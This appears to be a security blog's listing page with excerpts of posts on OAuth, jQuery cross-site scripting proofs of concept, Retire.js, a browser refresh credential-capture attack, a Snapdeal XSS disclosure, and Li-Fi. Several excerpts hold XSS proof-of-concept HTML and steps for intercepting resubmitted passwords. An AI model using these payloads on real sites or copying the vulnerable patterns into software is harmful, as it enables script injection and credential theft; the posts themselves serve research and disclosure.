Posts

OAuth 2.0 Security - How to Secure your OAuth

OAuth 2.0 OAuth is an open standard for authorization, commonly used as a way for Internet users to log in to third party websites using their accounts at Google, Facebook, Microsoft, Twitter, etc.—but without exposing their password. Generally, OAuth provides to clients a "secure delegated access" to server resources on behalf of a resource owner. Figure 1 shows the OAuth 2.0 exchange at an abstract level and illustrates the main entities.  For most parts of this document the focus is on the interaction between the Client and the Authorization Server and between the Client and the Resource Server.         +--------+                                                 +---------------+         |             |--(A)- Authorization Request ->|   Resource    |         |             |                                             |      Owner     |         |             |<-(B)-- Authorization Grant ------|                    |         |             |  

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <

Jquery Vulnerability Finder - Retire.js

Image
There is a plenty of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. " Using Components with Known Vulnerabilities " is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. Configure Retire.js for Chrome Browser: Step#1 : Download the  Retire.js  libraries form " https://github.com/RetireJS/retire.js " in zip format. Step#2 : Extract the zip to folder. Step#3 : Now use Bash terminal (Cygwin for Windows) and executes  build_chrome.sh  file. Step#4 : Open Chrome and Go to Extensions tab. Step#5 : Click "Load unpacked extensions" and browse for chrome folder located in  Retire.js  libraries folder. Step#6 : Click Ok button,  Retire.js  extension got installed and listed in tab. Now you can use this extension for finding vulnerabilities in Jquery. Step#

Browser refresh attack

Image
Browser refresh attack is attack which enables an adversary to obtain application credentials by going by to previous page and re-submitting the expired-document. How to perform: Log into to https://<some-site>/login Once logged in, try for change password and logout. Press "Back" on the browser window. Now you'll see the "Document Expired" page. Now run an interceptor (burp/tamper data) Click "Try again" on the web page Click "Re-send data" Watch the intercepted request. You'll observe that login passwords being resubmitted by browser get captured.

Snapdeal.com - Cross Site Scripting #Bug (DOM Based)

Image
It was shocking to get a XSS vulnerability in Snapdeal.com. Recently, I was using snapdeal for purchasing for some goods but when i tried my luck for XSS, it was hardly a matter of seconds. Basically it was DOM based XSS. The requested payload was not going to server. Instead it was being include in DOM itself and executes on browser. Proof of Concept: I used this URL with bcrumbSearch parameter which was used for searching the product name from DOM. As you try to use this URL, script get executes on browser and I got a million dollar smile. Aftermath : As a responsible security researcher, I reported this issue to help@snapdeal.com and support@snapdeal.com. I didn't got any reply from their side yet but meanwhile issue got patched without any intimation.

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   

Lifi: The New WireLess Tech

Image
Imagine a world where every one of the billions of lightbulbs in use today is a wireless hotspot delivering connectivity at speeds that can only be dreamed of with Wi-Fi. That's the goal of the man who invented such a technology, and this week Li-Fi took a step out of the domain of science fiction and into the realm of the real when it was shown to deliver speeds 100 times faster than current Wi-Fi technology in actual tests. An Estonian startup called Velmenni used a Li-Fi-enabled lightbulb to transmit data at speeds as fast as 1 gigabit per second (Gbps), which is about 100 times faster than current Wi-Fi technology, meaning a high-definition film could be downloaded within seconds. The real-world test is the first to be carried out, but laboratory tests have shown theoretical speeds of 224 Gbps. Who Invented Li-Fi? The term was coined by German physicist Harald Haas during a TED Talk when he outlined the idea of using lightbulbs as wireless routers. That addre